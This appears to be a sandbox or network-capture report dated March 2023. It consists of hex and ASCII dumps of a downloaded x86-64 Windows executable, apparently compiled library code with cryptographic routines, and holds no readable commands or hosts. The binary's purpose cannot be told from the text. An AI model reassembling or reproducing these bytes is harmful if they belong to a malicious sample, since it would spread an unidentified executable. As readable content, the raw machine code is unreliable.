e8 ff 85 c0 0f 8e a6 00 00 00 48 8b 55 00 45 31 c0 41 b9 1f
                                                                                                                                                                                                                    Data Ascii: ALot+HLHL&H8[^_A\DIHuL9&tLD$ L <AAE1f'|sLH8[^_A\IHtHAHtHLH8[^_A\fAWAVAUATUWVSH(LELs<HEH<HNHUE1A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3201INData Raw: 00 00 48 03 84 24 70 01 00 00 0f c8 89 83 08 01 00 00 31 c0 66 89 83 0c 01 00 00 0f b6 83 d0 00 00 00 c6 83 0e 01 00 00 00 48 c7 83 18 01 00 00 08 00 00 00 83 c0 10 88 83 0f 01 00 00 84 d2 75 18 48 8b 94 24 58 01 00 00 48 89 e9 e8 fa f0 ff ff 85 c0 0f 84 6b f7 ff ff 48 83 bc 24 78 01 00 00 00 74 2b 48 83 bc 24 80 01 00 00 00 74 20 4c 8b 84 24 80 01 00 00 48 8b 94 24 78 01 00 00 48 89 e9 e8 c4 f0 ff ff 85 c0 0f 84 35 f7 ff ff 48 83 bc 24 68 01 00 00 00 74 2b 48 83 bc 24 70 01 00 00 00 74 20 4c 8b 84 24 70 01 00 00 48 8b 94 24 68 01 00 00 48 89 e9 e8 8e f0 ff ff 85 c0 0f 84 ff f6 ff ff 41 b8 01 00 00 00 48 8d 15 b9 c0 2e 00 48 89 e9 e8 71 f0 ff ff 85 c0 0f 84 e2 f6 ff ff 48 8b 83 18 01 00 00 48 85 c0 0f 85 e6 07 00 00 c7 44 24 28 ff ff ff ff 45 31 c0 31 d2
                                                                                                                                                                                                                    Data Ascii: H$p1fHuH$XHkH$xt+H$t L$H$xH5H$ht+H$pt L$pH$hHAH.HqHHD$(E11
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3217INData Raw: 0f 11 47 31 89 f2 83 e2 f0 89 d0 39 d6 0f 84 c1 00 00 00 41 89 f0 41 29 d0 45 8d 48 ff 41 83 f9 06 76 2a 4c 8d 4c 17 01 f3 0f 7e 4c 14 50 44 89 c2 f3 41 0f 7e 01 83 e2 f8 01 d0 66 0f ef c1 66 41 0f d6 01 41 39 d0 0f 84 87 00 00 00 48 8b 7c 24 48 48 63 d0 44 0f b6 44 14 50 44 30 04 17 8d 50 01 39 d6 7e 6e 48 63 d2 44 0f b6 44 14 50 44 30 04 17 8d 50 02 39 d6 7e 5a 48 63 d2 44 0f b6 44 14 50 44 30 04 17 8d 50 03 39 d6 7e 46 48 63 d2 44 0f b6 44 14 50 44 30 04 17 8d 50 04 39 d6 7e 32 48 63 d2 44 0f b6 44 14 50 44 30 04 17 8d 50 05 39 d6 7e 1e 48 63 d2 83 c0 06 44 0f b6 44 14 50 44 30 04 17 39 c6 7e 0a 48 98 0f b6 54 04 50 30 14 07 41 bc 01 00 00 00 e9 65 fc ff ff 0f 1f 40 00 c7 44 24 20 43 00 00 00 4c 8d 0d 99 7a 3c 00 41 b8 78 00 00 00 45 31 e4 ba 9a 00 00
                                                                                                                                                                                                                    Data Ascii: G19AA)EHAv*LL~LPDA~ffAA9H|$HHcDDPD0P9~nHcDDPD0P9~ZHcDDPD0P9~FHcDDPD0P9~2HcDDPD0P9~HcDDPD09~HTP0Ae@D$ CLz<AxE1
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3233INData Raw: 08 48 8b 74 24 10 f3 c3 0f 1f 00 48 89 7c 24 08 48 89 74 24 10 48 89 e0 48 89 cf 48 89 d6 4c 89 c2 48 89 e0 53 55 41 54 41 55 41 56 41 57 48 c1 e2 04 48 81 ec 00 01 00 00 48 8d 14 d6 48 83 e4 c0 48 89 bc 24 80 00 00 00 48 89 b4 24 88 00 00 00 48 89 94 24 90 00 00 00 48 89 84 24 98 00 00 00 0f 29 b4 24 a0 00 00 00 0f 29 bc 24 b0 00 00 00 44 0f 29 84 24 c0 00 00 00 44 0f 29 8c 24 d0 00 00 00 44 0f 29 94 24 e0 00 00 00 44 0f 29 9c 24 f0 00 00 00 c5 f8 77 48 8b 07 48 8b 5f 08 48 8b 4f 10 48 8b 57 18 4c 8b 47 20 4c 8b 4f 28 4c 8b 57 30 4c 8b 5f 38 eb 02 66 90 c5 79 6f 1d c8 ee ff ff c5 fa 6f 06 48 8d 2d 3d ea ff ff c5 fa 6f 4e 10 c5 fa 6f 56 20 c4 c2 79 00 c3 c5 fa 6f 5e 30 c4 c2 71 00 cb c5 fa 6f 66 40 c4 c2 69 00 d3 c5 fa 6f 6e 50 c4 c2 61 00 db c5 fa 6f 76
                                                                                                                                                                                                                    Data Ascii: Ht$H|$Ht$HHHLHSUATAUAVAWHHHHH$H$H$H$)$)$D)$D)$D)$D)$wHH_HOHWLG LO(LW0L_8fyooH-=oNoV yo^0qof@ionPaov
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3249INData Raw: b5 02 00 00 45 31 c0 48 89 ea 48 89 d9 4c 89 5c 24 48 e8 34 9f eb ff 4c 8b 5c 24 48 85 c0 0f 84 95 02 00 00 4c 8b 84 24 88 00 00 00 48 8b 54 24 68 48 89 e9 e8 c2 97 f5 ff 4c 8b 5c 24 48 85 c0 0f 85 0f 03 00 00 48 8b 84 24 08 01 00 00 48 8b 54 24 50 41 bd 01 00 00 00 48 89 10 4c 89 d9 4c 89 f2 41 b8 7b 01 00 00 e8 de 9f ed ff 4c 89 f2 48 89 f1 41 b8 7c 01 00 00 e8 cd 9f ed ff 41 b8 7d 01 00 00 4c 89 f2 48 89 e9 e8 bc 9f ed ff 48 89 f9 e8 34 4d ea ff 4c 89 f9 e8 1c db f7 ff 48 8d 15 65 fb 3b 00 4c 89 e1 e8 ad 8c e7 ff 48 89 d9 e8 05 9a eb ff 44 89 e8 48 81 c4 98 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 66 0f 1f 44 00 00 31 db 45 31 db 31 ed 31 f6 45 31 e4 31 ff 4c 8d 35 e3 fa 3b 00 45 31 ff 48 8b 84 24 08 01 00 00 31 d2 4c 89 5c 24 48 45 31 ed 48 8b
                                                                                                                                                                                                                    Data Ascii: E1HHL\$H4L\$HL$HT$hHL\$HH$HT$PAHLLA{LHA|A}LHH4MLHe;LHDH[^_]A\A]A^A_fD1E111E11L5;E1H$1L\$HE1H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3265INData Raw: 00 00 00 b9 38 00 00 00 48 89 f2 e8 0b 62 ed ff 49 89 c4 48 85 c0 74 73 0f 11 38 0f 11 70 10 48 8b 84 24 c8 01 00 00 49 89 44 24 20 48 8b 84 24 d0 01 00 00 49 89 44 24 28 e8 6d 57 eb ff 90 0f 10 b4 24 40 01 00 00 0f 10 bc 24 50 01 00 00 4c 89 e0 48 81 c4 68 01 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 44 00 00 0f b6 43 01 83 e8 2f 74 47 85 c0 0f 95 c0 0f b6 c0 48 89 74 c4 30 4c 8d 78 01 e9 f7 fe ff ff 90 c7 44 24 20 54 00 00 00 49 89 f1 41 b8 41 00 00 00 ba 72 00 00 00 b9 2c 00 00 00 e8 40 33 eb ff e8 1b 58 eb ff 4c 89 e9 ff 53 48 eb 87 0f 1f 00 0f b6 43 02 83 e8 2f eb b0 0f 1f 80 00 00 00 00 48 83 ec 38 4c 89 44 24 50 4c 8d 44 24 50 4c 89 4c 24 58 48 8b 01 4c 89 44 24 28 4c 8b 48 18 31 c0 4d 85 c9 74 07 48 8b 49 08 41 ff d1 48 83 c4 38 c3 66 66
                                                                                                                                                                                                                    Data Ascii: 8HbIHts8pH$ID$ H$ID$(mW$@$PLHh[^_]A\A]A^A_DC/tGHt0LxD$ TIAAr,@3XLSHC/H8LD$PLD$PLL$XHLD$(LH1MtHIAH8ff
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3281INData Raw: ff ff 66 0f 1f 84 00 00 00 00 00 e8 8b 17 f5 ff 45 31 e4 e9 fe fd ff ff 0f 1f 00 44 8d 40 ff 66 42 83 bc 44 50 02 00 00 0a 4c 89 c1 0f 85 11 fd ff ff 41 b8 0a 00 00 00 89 4c 24 4c 89 c8 66 44 89 84 54 50 02 00 00 e9 f7 fc ff ff 0f 1f 80 00 00 00 00 44 8d 40 ff 42 80 7c 04 50 0a 0f 85 91 fd ff ff c6 44 14 50 0a 44 89 c0 e9 84 fd ff ff 0f 1f 00 48 8b 35 a9 4c 4c 00 48 8d bc 24 50 02 00 00 eb 1d 0f 1f 80 00 00 00 00 ba 0a 00 00 00 48 89 f9 e8 23 92 10 00 48 85 c0 0f 85 53 fe ff ff 49 89 f0 ba 04 00 00 00 48 89 f9 e8 d2 90 10 00 48 85 c0 75 d5 e9 5b fd ff ff 41 56 41 55 41 54 48 83 ec 20 49 89 cd 48 89 d1 49 89 d4 e8 e8 f5 ff ff 83 f8 02 74 23 83 f8 03 0f 84 1a 01 00 00 83 f8 01 0f 84 b9 00 00 00 b8 01 00 00 00 48 83 c4 20 41 5c 41 5d 41 5e c3 90 4c 89 e1 e8
                                                                                                                                                                                                                    Data Ascii: fE1D@fBDPLAL$LfDTPD@B|PDPDH5LLH$PH#HSIHHu[AVAUATH IHIt#H A\A]A^L
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3297INData Raw: ff eb ae 0f 1f 84 00 00 00 00 00 41 b8 7e 00 00 00 ba 7b 00 00 00 b9 22 00 00 00 c7 44 24 20 13 01 00 00 4c 8d 0d 01 78 3b 00 e8 bc b3 ea ff eb be 41 b8 41 00 00 00 ba 7b 00 00 00 b9 22 00 00 00 c7 44 24 20 19 01 00 00 4c 8d 0d db 77 3b 00 4c 89 5c 24 30 e8 91 b3 ea ff 48 8b 4c 24 30 e8 b7 5b f2 ff eb 89 41 b8 41 00 00 00 ba 99 00 00 00 b9 22 00 00 00 c7 44 24 20 e6 00 00 00 4c 8d 0d a6 77 3b 00 e8 61 b3 ea ff 31 c9 e8 8a 5b f2 ff e9 1b ff ff ff 0f 1f 44 00 00 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 48 49 89 cd 4c 89 c1 49 89 d6 4c 89 c5 e8 bf 5b f2 ff 31 c9 89 c2 89 44 24 3c 89 c7 e8 e0 50 f2 ff 49 89 c4 48 85 c0 0f 84 be 01 00 00 31 db 4c 8d 3d 90 77 3b 00 85 ff 7f 5b e9 98 01 00 00 66 90 48 8d 15 88 77 3b 00 48 89 f9 e8 81 c7 f4 ff 41 b9 06 00 00
                                                                                                                                                                                                                    Data Ascii: A~{"D$ Lx;AA{"D$ Lw;L\$0HL$0[AA"D$ Lw;a1[DAWAVAUATUWVSHHILIL[1D$<PIH1L=w;[fHw;HA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3313INData Raw: 89 07 b8 01 00 00 00 48 83 c4 48 5b 5e 5f 5d c3 0f 1f 00 c7 44 24 20 77 00 00 00 49 89 e9 41 b8 41 00 00 00 ba 7f 00 00 00 b9 0d 00 00 00 e8 b8 73 ea ff 31 c0 48 83 c4 48 5b 5e 5f 5d c3 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 41 57 41 56 41 55 41 54 56 53 48 83 ec 58 49 8b 70 18 48 89 94 24 98 00 00 00 49 89 ce 4c 89 c3 48 85 f6 0f 84 4f 01 00 00 48 83 7e 18 00 0f 84 44 01 00 00 4c 8d 3d 25 7d 3b 00 41 b8 3f 00 00 00 b9 30 00 00 00 4c 89 fa e8 82 a1 ec ff 49 89 c5 e8 8a 38 01 00 48 89 c1 e8 72 17 e7 ff 49 89 c4 4d 85 ed 0f 84 de 00 00 00 48 85 c0 0f 84 d5 00 00 00 4c 89 f2 48 89 c1 e8 52 35 e7 ff 49 89 c6 48 85 c0 0f 84 be 00 00 00 4c 8d 05 af fc ff ff 48 8d 15 a8 fe ff ff 4c 89 e1 e8 50 38 01 00 4c 8d 05 09 fd ff ff 48 8d 15 92 fd ff ff 4c 89 e1 e8 aa 38
                                                                                                                                                                                                                    Data Ascii: HH[^_]D$ wIAAs1HH[^_]ff.fAWAVAUATVSHXIpH$ILHOH~DL=%};A?0LI8HrIMHLHR5IHLHLP8LHL8
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3329INData Raw: ec 20 48 89 cf 48 89 d6 44 89 c3 e8 9b 33 e7 ff 85 c0 0f 85 8f 00 00 00 44 8b 4f 08 41 83 e9 01 78 6c 4d 63 d9 41 c1 e1 06 48 8b 3f 41 83 e9 01 eb 16 66 0f 1f 84 00 00 00 00 00 49 83 eb 01 41 83 e9 40 45 85 db 78 46 4e 8b 14 df 4d 85 d2 74 ea 48 b9 00 00 00 00 00 00 00 80 41 8d 51 40 0f 1f 40 00 49 85 ca 74 0e 39 c3 7e 07 4c 63 c0 42 89 14 86 83 c0 01 83 ea 01 48 d1 e9 41 39 d1 75 e2 49 83 eb 01 41 83 e9 40 45 85 db 79 ba 39 c3 7e 0d 48 63 d0 83 c0 01 c7 04 96 ff ff ff ff 48 83 c4 20 5b 5e 5f c3 31 c0 48 83 c4 20 5b 5e 5f c3 66 2e 0f 1f 84 00 00 00 00 00 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 38 48 8d 35 b9 6f 3b 00 45 31 e4 49 89 ce 4c 89 c9 49 89 d7 4c 89 c7 4c 89 cd e8 92 1a e7 ff 41 b8 da 01 00 00 48 89 f2 8d 58 01 48 63 cb 48 c1 e1 02 e8 7a 5f
                                                                                                                                                                                                                    Data Ascii: HHD3DOAxlMcAH?AfIA@ExFNMtHAQ@@It9~LcBHA9uIA@Ey9~HcH [^_1H [^_f.AWAVAUATUWVSH8H5o;E1ILILLAHXHcHz_
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3345INData Raw: 88 70 ff 48 8d 50 ff 89 f1 48 8d 42 ff 88 6a ff 89 f1 48 8d 50 ff c1 e9 10 88 48 ff c1 ee 18 44 89 e3 40 88 72 ff 89 ee 89 f0 89 f1 c1 e8 18 c1 e9 10 41 89 c1 89 f0 0f b6 c4 41 89 c2 89 d8 41 89 d8 c1 e8 18 41 c1 e8 10 89 c2 0f b6 c7 41 89 c3 0f b6 db 45 0f b6 db 45 0f b6 c0 0f b6 d2 48 c1 e3 08 40 0f b6 f6 45 0f b6 d2 0f b6 c9 4c 09 db 48 8b 84 24 c0 00 00 00 45 0f b6 c9 48 c1 e3 08 4c 09 c3 48 c1 e3 08 48 09 d3 48 c1 e3 08 48 09 f3 48 c1 e3 08 4c 09 d3 48 c1 e3 08 48 09 cb 48 c1 e3 08 4c 09 cb 48 89 18 48 83 c4 58 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 31 c9 44 0f b6 40 ff 48 83 e8 01 41 c1 e0 10 41 09 c8 0f b6 48 ff 4c 8d 48 ff c1 e1 18 44 09 c1 31 d9 45 0f b6 51 ff 49 8d 41 ff 44 0f b6 48 ff 4c 8d 40 ff 41 c1 e1 08 45 09 d1 49 8d 40 ff 45 0f b6 40 ff
                                                                                                                                                                                                                    Data Ascii: pHPHBjHPHD@rAAAAAEEH@ELH$EHLHHHHHLHHHLHHX[^_]A\A]A^A_1D@HAAHLHD1EQIADHL@AEI@E@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3361INData Raw: e9 c9 fb ff ff 4c 89 e7 e9 5b f7 ff ff 48 c7 44 24 58 00 00 00 00 48 8d 9c 24 90 00 00 00 e9 7f f2 ff ff 48 89 ee 45 89 d0 48 89 fd 49 89 c1 e9 b8 f5 ff ff 45 89 d0 e9 a3 f5 ff ff be 01 00 00 00 e9 a8 f4 ff ff 41 b8 41 00 00 00 ba 79 00 00 00 b9 0e 00 00 00 c7 44 24 20 a6 01 00 00 4c 8d 0d a6 2c 3b 00 e8 81 b3 e9 ff 48 89 5c 24 58 48 8b 7c 24 78 48 8d 9c 24 90 00 00 00 e9 21 f2 ff ff c7 44 24 20 a0 01 00 00 4c 8d 0d 7b 2c 3b 00 41 b8 41 00 00 00 e9 ff f8 ff ff c7 44 24 20 97 01 00 00 4c 8d 0d 61 2c 3b 00 41 b8 65 00 00 00 e9 e5 f8 ff ff 66 0f 1f 44 00 00 41 55 41 54 53 48 83 ec 30 49 89 cd 48 89 d1 48 8d 15 8f 2c 3b 00 4c 89 c3 e8 62 87 e6 ff 49 89 c4 48 85 c0 74 2a 4c 89 e9 49 89 d8 48 89 c2 e8 4c ef ff ff 4c 89 e1 41 89 c5 e8 a1 58 e6 ff 44 89 e8 48 83
                                                                                                                                                                                                                    Data Ascii: L[HD$XH$HEHIEAAyD$ L,;H\$XH|$xH$!D$ L{,;AAD$ La,;AefDAUATSH0IHH,;LbIHt*LIHLLAXDH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3377INData Raw: 83 c4 68 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 3d 9b 00 00 00 0f 85 9d fe ff ff 4c 89 f9 e8 b5 0c 00 00 4c 8b 4c 24 30 49 89 f0 48 89 ea 48 89 c1 e8 e2 fa ff ff 85 c0 0f 85 7a fe ff ff e9 16 ff ff ff 0f 1f 44 00 00 4c 89 f9 e8 d8 0c 00 00 3d 9e 00 00 00 0f 85 5d fe ff ff 4c 89 f9 e8 05 0d 00 00 48 89 c7 48 85 c0 0f 84 ea fe ff ff 4d 85 f6 74 16 4d 8b 56 08 45 8b 06 48 89 c1 4c 89 d2 e8 42 5c f2 ff 85 c0 74 2f 4d 85 e4 74 15 48 8b 4c 24 48 4c 89 e2 e8 5c 45 f5 ff 85 c0 0f 89 24 01 00 00 48 8b 4c 24 30 48 89 fa e8 07 17 f1 ff 85 c0 0f 85 ff fd ff ff 48 89 f9 4c 8b 74 24 38 e8 42 57 f2 ff e9 93 fe ff ff 0f 1f 44 00 00 48 8b 15 91 c2 40 00 4c 89 e9 4c 8b 74 24 38 8b 7c 24 44 e8 90 1a f1 ff e9 2b fd ff ff 0f 1f 00 4c 89 e1 e8 f0 6a 00 00 49 89 c5 e9
                                                                                                                                                                                                                    Data Ascii: h[^_]A\A]A^A_=LLL$0IHHzDL=]LHHMtMVEHLB\t/MtHL$HL\E$HL$0HHLt$8BWDH@LLt$8|$D+LjI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3393INData Raw: 01 f7 49 31 f6 49 c1 c1 20 48 03 74 24 48 49 c1 c6 20 4c 31 f9 4d 01 cf 4c 01 f5 4c 31 fa 48 d1 c1 48 31 e8 48 c1 ca 18 48 c1 c8 18 48 01 d3 48 01 c6 49 31 d9 49 31 f6 49 c1 ce 10 4c 01 f5 48 31 e8 48 d1 c0 49 c1 c9 10 4c 03 54 24 40 4c 03 5c 24 18 4d 01 cf 49 01 ca 4c 31 fa 4c 89 bc 24 90 00 00 00 4d 31 d0 4c 8b bc 24 98 00 00 00 49 c1 c0 20 4c 03 54 24 28 48 d1 c2 4d 01 fb 4d 01 c4 4c 31 df 4c 31 e1 4c 03 5c 24 08 48 c1 c7 20 48 c1 c9 18 49 01 fd 49 01 ca 4d 31 ef 4d 31 d0 49 c1 cf 18 49 c1 c8 10 4d 01 fb 4d 01 c4 4c 31 df 4c 31 e1 48 c1 cf 10 48 d1 c1 49 01 fd 4d 31 ef 49 d1 c7 48 03 74 24 40 4c 01 fe 49 31 f1 48 03 74 24 30 49 c1 c1 20 4d 01 cc 4d 31 e7 49 c1 cf 18 4c 01 fe 49 31 f1 49 c1 c9 10 4d 01 cc 4d 31 e7 49 d1 c7 4c 89 bc 24 98 00 00 00 48 03
                                                                                                                                                                                                                    Data Ascii: I1I Ht$HI L1MLL1HH1HHHHI1I1ILH1HILT$@L\$MIL1L$M1L$I LT$(HMML1L1L\$H HIIM1M1IIMML1L1HHIM1IHt$@LI1Ht$0I MM1ILI1IMM1IL$H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3409INData Raw: 4d 8b 84 24 88 00 00 00 49 8b 94 24 98 00 00 00 4c 89 e1 4d 89 c1 e8 10 fe ff ff 44 89 e8 48 83 c4 28 41 5c 41 5d c3 41 bd 19 f0 ff ff eb be 66 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 91 88 00 00 00 c3 0f 1f 84 00 00 00 00 00 48 8b 81 88 00 00 00 c3 0f 1f 84 00 00 00 00 00 48 8b 41 08 48 8b 91 80 00 00 00 4c 8b 40 40 48 89 d0 4c 29 c0 49 39 d0 ba 00 00 00 00 48 0f 43 c2 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 48 8b 41 58 48 8b 00 48 85 c0 74 26 4c 8b 40 20 48 8b 41 40 b9 ff ff ff 7f 4c 89 c2 48 29 c2 48 39 ca 48 0f 47 d1 49 39 c0 b8 00 00 00 00 0f 47 c2 c3 b8 ff ff ff ff c3 0f 1f 84 00 00 00 00 00 41 54 56 53 48 83 ec 20 48 8b 41 58 48 8b 18 48 89 ce 48 85 db 75 1a eb 67 0f 1f 80 00 00 00 00 4c 89 e1 ff d0 48 8b 46 58 48 8b 18 48 85 db 74 4f 48 8b 46
                                                                                                                                                                                                                    Data Ascii: M$I$LMDH(A\A]Aff.HHHAHL@@HL)I9HCff.HAXHHt&L@ HA@LH)H9HGI9GATVSH HAXHHHugLHFXHHtOHF
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3425INData Raw: 38 48 c7 43 28 00 00 00 00 48 83 c4 20 5b 5e 41 5c 48 ff 25 c7 d3 7a 00 0f 1f 00 ff 15 36 e0 7a 00 e9 56 ff ff ff 0f 1f 44 00 00 41 b8 67 01 00 00 48 8d 15 f3 a1 3a 00 48 8d 0d a2 a2 3a 00 ff 15 7a da 7a 00 e9 7c ff ff ff 90 41 b8 5c 01 00 00 48 8d 15 d3 a1 3a 00 48 8d 0d 14 a2 3a 00 ff 15 5a da 7a 00 8b 83 48 01 00 00 e9 83 fe ff ff 0f 84 55 fe ff ff 4c 8b 0d 7e 11 4a 00 4d 89 c8 e9 e9 fd ff ff 66 0f 1f 44 00 00 c7 05 5e 11 4a 00 00 00 00 00 4c 89 c9 e8 0e c5 ff ff 48 c7 05 53 11 4a 00 00 00 00 00 e9 1e fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 48 8b 41 28 83 fa 01 75 07 83 08 01 31 c0 c3 90 b8 2a f0 ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 2a f0 ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 44 8b 41 30
                                                                                                                                                                                                                    Data Ascii: 8HC(H [^A\H%z6zVDAgH:H:zz|A\H:H:ZzHUL~JMfD^JLHSJff.HA(u1*f.f.*f.DA0
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3441INData Raw: 31 c0 4c 89 f9 ff 15 ec 98 7a 00 89 5c 24 38 44 8b 54 24 3c e9 7a fe ff ff 41 c7 85 4c 01 00 00 06 00 00 00 b9 06 00 00 00 e8 8d cf ff ff 48 98 49 89 85 88 00 00 00 e9 d1 fe ff ff 49 c7 85 88 00 00 00 00 00 00 00 e9 c1 fe ff ff b9 ec 03 00 00 b8 ec 03 00 00 e9 5f fe ff ff 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 68 8b 99 50 01 00 00 4c 89 c5 45 8b 00 48 89 54 24 30 48 89 ce 41 f6 c0 03 0f 84 02 03 00 00 80 7d 04 00 0f 85 0d 04 00 00 8b 81 70 01 00 00 85 c0 0f 84 ca 02 00 00 48 8b 91 78 01 00 00 8d 48 ff 31 ff 48 c1 e1 04 48 8d 42 10 48 01 c1 eb 05 90 48 83 c0 10 8b 12 48 01 d7 48 89 c2 48 39 c8 75 ef 48 85 ff 0f 84 96 02 00 00 48 8b 45 10 41 83 e0 08 49 89 c6 75 11 4c 8b b6 80 01 00 00 49 83 fe ff 0f 84 1d 03 00 00 49 8d 14 3e 48 8b 4d 08 48 89 54 24
                                                                                                                                                                                                                    Data Ascii: 1Lz\$8DT$<zALHII_AWAVAUATUWVSHhPLEHT$0HA}pHxH1HHBHHHHH9uHHEAIuLII>HMHT$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3457INData Raw: 8d 93 20 01 00 00 48 85 f6 74 38 48 8d 05 39 a4 ff ff 41 83 45 20 01 4c 8d 0d ad d8 ff ff 4c 89 e9 48 89 44 24 20 41 b8 01 00 00 00 e8 ca 36 ff ff 44 89 e0 48 83 c4 30 5b 5e 5f 41 5c 41 5d c3 0f 1f 00 48 89 d1 e8 80 d8 ff ff 44 8b a3 88 00 00 00 44 89 e0 48 83 c4 30 5b 5e 5f 41 5c 41 5d c3 66 2e 0f 1f 84 00 00 00 00 00 89 83 4c 01 00 00 89 c1 e8 43 8f ff ff 41 89 c4 48 98 48 89 83 88 00 00 00 44 89 e0 48 83 c4 30 5b 5e 5f 41 5c 41 5d c3 41 bc 19 f0 ff ff eb 96 41 55 41 54 55 57 56 53 48 83 ec 38 48 8b ac 24 90 00 00 00 49 89 cd 48 89 d3 4d 89 c4 44 89 ce 48 85 d2 0f 84 40 01 00 00 e8 32 7d ff ff 89 d8 4c 89 6b 78 45 31 c9 48 8d bb 60 01 00 00 c7 43 08 06 00 00 00 4c 89 e2 48 83 e7 f8 48 c7 43 40 00 00 00 00 29 f8 c7 43 70 13 00 00 00 8d 88 c8 01 00 00 31
                                                                                                                                                                                                                    Data Ascii: Ht8H9AE LLHD$ A6DH0[^_A\A]HDDH0[^_A\A]f.LCAHHDH0[^_A\A]AAUATUWVSH8H$IHMDH@2}LkxE1H`CLHHC@)Cp1
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3473INData Raw: f6 74 60 48 8b 7e 08 48 85 ff 74 7f 48 8b 8e 18 01 00 00 ff 15 de 14 7a 00 45 31 c0 31 d2 48 8b 4f 38 4c 8d 4b 40 ff 15 b3 17 7a 00 85 c0 74 7a 31 c0 48 83 c4 20 5b 5e 5f c3 90 41 b8 36 02 00 00 48 8d 15 93 f0 39 00 48 8d 0d b4 f0 39 00 ff 15 6a 1a 7a 00 48 8b 73 70 48 85 f6 75 a5 0f 1f 44 00 00 41 b8 38 02 00 00 48 8d 15 6b f0 39 00 48 8d 0d 90 f0 39 00 ff 15 42 1a 7a 00 48 8b 7e 08 48 85 ff 75 86 0f 1f 44 00 00 41 b8 3a 02 00 00 48 8d 15 43 f0 39 00 48 8d 0d 6f f0 39 00 ff 15 1a 1a 7a 00 e9 62 ff ff ff ff 15 4f 15 7a 00 48 8d 15 5c f0 39 00 89 c1 e8 3d 4e ff ff 90 66 66 2e 0f 1f 84 00 00 00 00 00 90 57 56 53 48 83 ec 20 48 89 cb 89 d6 48 85 c9 74 77 48 8b 3b 48 85 ff 74 4f 40 84 f6 75 2a 48 8b 47 08 45 31 c0 8b 53 48 4c 8d 4b 40 48 8b 48 38 ff 15 de 16
                                                                                                                                                                                                                    Data Ascii: t`H~HtHzE11HO8LK@ztz1H [^_A6H9H9jzHspHuDA8Hk9H9BzH~HuDA:HC9Ho9zbOzH\9=Nff.WVSH HHtwH;HtO@u*HGE1SHLK@HH8
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3489INData Raw: 48 8d 0d 1c b4 39 00 ff 15 b2 da 79 00 e9 b1 fe ff ff 66 0f 1f 84 00 00 00 00 00 48 8d 15 b9 b0 39 00 41 b8 c7 07 00 00 48 8d 0d c3 b4 39 00 ff 15 8a da 79 00 41 8b 54 24 78 41 8b 44 24 58 e9 65 fe ff ff 0f 1f 80 00 00 00 00 f3 0f 6f 05 e8 b6 39 00 4c 8d 44 24 30 4c 89 e1 0f 11 44 24 30 e8 66 db ff ff 41 8b 44 24 58 25 00 10 01 00 3d 00 10 00 00 0f 85 98 fe ff ff 4c 89 e2 4c 89 e9 48 83 c4 50 5b 41 5c 41 5d e9 5d d7 ff ff 0f 1f 44 00 00 ff 15 66 d5 79 00 f3 0f 6f 0d 9a b6 39 00 4c 8d 44 24 30 4c 89 e1 89 c2 0f 11 4c 24 30 e8 16 db ff ff e9 a2 fe ff ff 90 41 55 41 54 57 56 53 48 83 ec 20 83 7a 10 07 48 89 ce 48 89 d3 4d 89 c4 74 1a 41 b8 08 08 00 00 48 8d 15 f9 af 39 00 48 8d 0d 3f b1 39 00 ff 15 d0 d9 79 00 48 8b 43 60 49 8b 54 24 60 48 39 d0 0f 82 4a 02
                                                                                                                                                                                                                    Data Ascii: H9yfH9AH9yAT$xAD$Xeo9LD$0LD$0fAD$X%=LLHP[A\A]]Dfyo9LD$0LL$0AUATWVSH zHHMtAH9H?9yHC`IT$`H9J
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC3505INData Raw: 41 c7 81 88 00 00 00 00 00 00 00 e9 4a fd ff ff 0f 1f 00 49 89 49 70 e9 c9 fc ff ff 0f 1f 80 00 00 00 00 45 84 d2 74 07 4c 89 0d 24 63 71 00 49 89 d1 eb cc 45 84 d2 74 07 4c 89 0d 13 63 71 00 8b 90 88 00 00 00 89 91 88 00 00 00 c7 80 88 00 00 00 00 00 00 00 48 8b 51 70 48 85 d2 74 0a c7 82 88 00 00 00 00 00 00 00 48 8b 50 70 48 8b 4a 78 48 89 48 70 48 85 c9 74 07 48 89 81 80 00 00 00 48 8b 88 80 00 00 00 48 89 8a 80 00 00 00 48 85 c9 0f 84 b4 00 00 00 48 3b 41 70 0f 84 c0 01 00 00 48 89 51 78 4c 8b 0d a6 62 71 00 48 89 42 78 48 89 90 80 00 00 00 e9 3a ff ff ff 45 84 d2 74 07 4c 89 0d 8a 62 71 00 48 85 d2 75 62 41 c7 80 88 00 00 00 00 00 00 00 48 8b 51 78 c7 81 88 00 00 00 01 00 00 00 4c 8b 42 70 4c 89 41 78 4d 85 c0 74 07 49 89 88 80 00 00 00 4c 8b 81 80
